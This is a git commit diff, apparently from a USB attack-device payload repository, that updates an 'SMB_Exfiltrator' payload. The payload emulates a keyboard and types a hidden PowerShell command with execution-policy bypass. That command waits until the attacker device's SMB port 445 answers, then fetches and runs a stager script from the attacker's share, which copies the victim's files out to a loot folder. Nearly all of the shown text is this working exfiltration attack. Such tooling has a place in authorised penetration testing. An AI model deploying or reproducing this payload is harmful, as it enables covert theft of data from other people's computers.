Updated SMB_Exfiltrator payload to wait for port 445 (SMB) rather than ICMP Ping response (#173)

This commit is contained in:
TheRealNoob 2017-04-16 03:57:02 -05:00 committed by Sebastian Kinne
parent 7c1a4a30f2
commit 1d95d9bfb8

View File

@ -57,8 +57,6 @@ rm -rf /loot/smb/*
cp /root/udisk/payloads/$SWITCH_POSITION/s.ps1 /loot/smb/
# Make loot directory on USB Disk
mkdir -p /root/udisk/loot/smb_exfiltrator
# Disable ICMP/echo replies so our powershell stager doesn't attempt to access the SMB share before smbserver starts (workaround since Test-NetConnection 172.16.64.1 SMB only works on powershell 4.0+ for Windows 8+)
echo "1" > /proc/sys/net/ipv4/icmp_echo_ignore_all
@ -67,7 +65,7 @@ echo "1" > /proc/sys/net/ipv4/icmp_echo_ignore_all
GET HOST_IP
LED STAGE1
ATTACKMODE HID
RUN WIN "powershell -WindowStyle Hidden -Exec Bypass \"while (\$true) { If (Test-Connection $HOST_IP -count 1) { \\\\$HOST_IP\\s\\s.ps1; exit } }\""
RUN WIN "powershell -WindowStyle Hidden -Exec Bypass \"While (\$true) { If ((New-Object net.sockets.tcpclient ($HOST_IP,445)).Connected) { \\\\$HOST_IP\\s\\s.ps1; exit } }\""